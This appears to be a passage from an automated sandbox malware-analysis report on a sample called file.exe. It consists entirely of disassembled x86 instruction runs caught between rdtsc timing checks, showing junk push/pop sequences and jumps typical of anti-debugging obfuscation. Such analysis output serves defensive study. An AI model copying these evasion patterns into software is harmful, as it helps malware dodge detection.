              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395E0 second address: 239681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e jmp 00007F4668B9A730h 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a pushad 0x0000001b jmp 00007F4668B9A730h 0x00000020 cld 0x00000021 popad 0x00000022 mov eax, dword ptr [ebp+122D104Dh] 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F4668B9A728h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov ebx, 05DB713Bh 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F4668B9A728h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000019h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 cld 0x00000064 nop 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F4668B9A734h 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C43E second address: 23C445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A6C5 second address: 23A6CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A6CF second address: 23A6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A6D3 second address: 23A6D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B609 second address: 23B636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F466925DD96h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F466925DDA5h 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B6DF second address: 23B6E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D4BD second address: 23D4C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C649 second address: 23C64F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C64F second address: 23C65A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F466925DD96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C65A second address: 23C704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F4668B9A728h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007F4668B9A736h 0x00000027 push dword ptr fs:[00000000h] 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F4668B9A728h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov dword ptr fs:[00000000h], esp 0x0000004f stc 0x00000050 mov eax, dword ptr [ebp+122D1109h] 0x00000056 push FFFFFFFFh 0x00000058 call 00007F4668B9A739h 0x0000005d mov bh, dh 0x0000005f pop edi 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 pop eax 0x00000066 jmp 00007F4668B9A72Eh 0x0000006b popad 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B6E5 second address: 23B6E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E5B5 second address: 23E5DE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4668B9A728h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4668B9A739h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E5DE second address: 23E5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E6CD second address: 23E6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242808 second address: 242839 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F466925DDA6h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F466925DDA0h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242839 second address: 24283D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24283D second address: 242843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 246CE9 second address: 246CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2464DE second address: 2464E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28D14B second address: 28D168 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4668B9A737h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28D168 second address: 28D174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28D174 second address: 28D1A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A72Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 js 00007F4668B9A726h 0x00000016 jmp 00007F4668B9A72Eh 0x0000001b pop edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28D1A0 second address: 28D1B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F466925DD9Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293DAF second address: 293DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293DB7 second address: 293DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F466925DD9Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d jnp 00007F466925DD96h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293DCA second address: 293DEF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4668B9A728h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F4668B9A726h 0x00000010 jmp 00007F4668B9A733h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BAC7 second address: 29BACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A136 second address: 29A156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F4668B9A72Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A156 second address: 29A15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A96B second address: 29A96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A96F second address: 29A974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A974 second address: 29A97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B150 second address: 29B16B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B16B second address: 29B1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A739h 0x00000009 jmp 00007F4668B9A72Eh 0x0000000e popad 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push edx 0x00000012 je 00007F4668B9A726h 0x00000018 jnp 00007F4668B9A726h 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4668B9A737h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B952 second address: 29B956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB37 second address: 29FB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4668B9A726h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4668B9A737h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB5C second address: 29FB62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB62 second address: 29FB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F4668B9A726h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB74 second address: 29FB8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F466925DD9Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB8A second address: 29FB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A59E8 second address: 2A59FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5AF6 second address: 2A5B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A738h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5B12 second address: 2A5B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5B16 second address: 2A5B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5B1C second address: 2A5B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F466925DD98h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5B2D second address: 2A5B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4668B9A72Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC382 second address: 2AC388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC388 second address: 2AC38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC38C second address: 2AC3AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F466925DDA6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC3AE second address: 2AC3BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F4668B9A732h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC3BE second address: 2AC3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC3C4 second address: 2AC3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jc 00007F4668B9A726h 0x0000000b jmp 00007F4668B9A72Ah 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B3E36 second address: 2B3E52 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F466925DD96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F466925DDA0h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B3E52 second address: 2B3E5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B3E5A second address: 2B3E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B3E5E second address: 2B3E62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5E8B second address: 2B5E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5E8F second address: 2B5E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5E93 second address: 2B5E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5E9B second address: 2B5EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4668B9A726h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5EA5 second address: 2B5EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7996 second address: 2B79B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A735h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B79B8 second address: 2B79C2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F466925DDA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B79C2 second address: 2B79CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4668B9A726h 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C941B second address: 2C9428 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C9428 second address: 2C9431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1121 second address: 2D1125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1528 second address: 2D154F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F4668B9A72Fh 0x0000000b jmp 00007F4668B9A731h 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D154F second address: 2D1565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Fh 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F32 second address: 2D1F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F38 second address: 2D1F55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA7h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F55 second address: 2D1F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F5A second address: 2D1F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F63 second address: 2D1F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4668B9A730h 0x0000000f push ebx 0x00000010 jmp 00007F4668B9A72Dh 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F8C second address: 2D1FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F466925DDA7h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D67C1 second address: 2D67C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D67C7 second address: 2D6804 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F466925DD9Fh 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F466925DDA5h 0x00000015 jc 00007F466925DDA2h 0x0000001b jng 00007F466925DD96h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D6804 second address: 2D6808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D6808 second address: 2D680D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D680D second address: 2D681A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F4668B9A72Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E47CF second address: 2E47D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1CF1 second address: 2F1CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1B89 second address: 2F1B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1B8D second address: 2F1BB2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4668B9A726h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4668B9A737h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1BB2 second address: 2F1BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F474D second address: 2F4751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F48BE second address: 2F48D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F466925DDA2h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F9196 second address: 2F919C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F919C second address: 2F91A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F91A2 second address: 2F91BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A732h 0x00000007 jnp 00007F4668B9A72Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FA8B9 second address: 2FA8E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jc 00007F466925DDBDh 0x00000011 jne 00007F466925DD98h 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F466925DD96h 0x0000001f jmp 00007F466925DD9Bh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31275A second address: 31277A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4668B9A72Ch 0x00000008 jbe 00007F4668B9A726h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4668B9A72Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311876 second address: 31189D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F466925DD9Eh 0x00000010 rdtsc
